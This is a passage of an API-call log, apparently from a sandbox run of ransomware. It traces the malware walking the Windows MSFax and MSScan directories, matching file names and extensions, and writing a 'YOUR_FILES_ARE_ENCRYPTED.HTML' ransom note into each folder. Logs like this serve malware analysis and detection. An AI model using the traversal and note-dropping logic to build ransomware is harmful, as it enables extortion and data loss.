NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.021] GetProcessHeap () returned 0x270000 [0170.022] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.022] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 67 [0170.022] GetProcessHeap () returned 0x270000 [0170.022] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.023] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0170.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0170.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f3200 [0170.023] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 73 [0170.023] GetProcessHeap () returned 0x270000 [0170.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.025] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0170.026] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0170.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc1333e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1333e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.026] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 87 [0170.026] lstrcmpW (lpString1="confident.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.026] PathFindExtensionW 
(pszPath="confident.cov") returned=".cov" [0170.026] lstrlenW (lpString=".cov") returned 4 [0170.026] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0170.026] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 81 [0170.026] lstrcmpW (lpString1="fyi.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.026] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0170.026] lstrlenW (lpString=".cov") returned 4 [0170.026] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 85 [0170.027] lstrcmpW (lpString1="generic.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.027] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0170.027] lstrlenW (lpString=".cov") returned 4 [0170.027] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 84 [0170.027] lstrcmpW (lpString1="urgent.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.027] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0170.027] lstrlenW (lpString=".cov") returned 4 [0170.027] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0170.027] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.027] FindClose (in: 
hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0170.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.028] GetProcessHeap () returned 0x270000 [0170.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.028] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0170.028] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.028] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.028] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0170.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.029] GetProcessHeap () returned 0x270000 [0170.029] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.029] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 55 [0170.029] GetProcessHeap () returned 0x270000 [0170.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.029] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0170.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0170.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.030] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.030] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.030] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.030] wnsprintfW (in: 
pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.030] GetProcessHeap () returned 0x270000 [0170.031] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 55 [0170.031] GetProcessHeap () returned 0x270000 [0170.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.031] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0170.031] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0170.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.031] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.031] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.031] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.031] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.032] GetProcessHeap () returned 0x270000 [0170.032] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.032] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 59 [0170.032] GetProcessHeap () returned 0x270000 [0170.032] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.032] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" 
[0170.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0170.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc17f6a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc17f6a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.033] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0170.033] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.033] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.033] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0170.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.033] GetProcessHeap () returned 0x270000 [0170.034] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.034] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 62 [0170.034] GetProcessHeap () returned 0x270000 [0170.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.034] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0170.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0170.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc1a5800, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1a5800, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.034] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 68 [0170.034] GetProcessHeap () returned 0x270000 [0170.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.034] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0170.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0170.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc17f6a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc17f6a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 83 [0170.035] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.035] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0170.035] lstrlenW (lpString=".tif") returned 4 [0170.035] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.035] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned 0 [0170.035] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.035] GetProcessHeap () returned 0x270000 [0170.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.036] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.036] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.036] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.036] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.036] GetProcessHeap () returned 0x270000 [0170.037] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.037] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.037] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.038] GetProcessHeap () returned 0x270000 [0170.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.038] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned 50 [0170.038] GetProcessHeap () returned 0x270000 [0170.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.038] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan" [0170.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\*") 
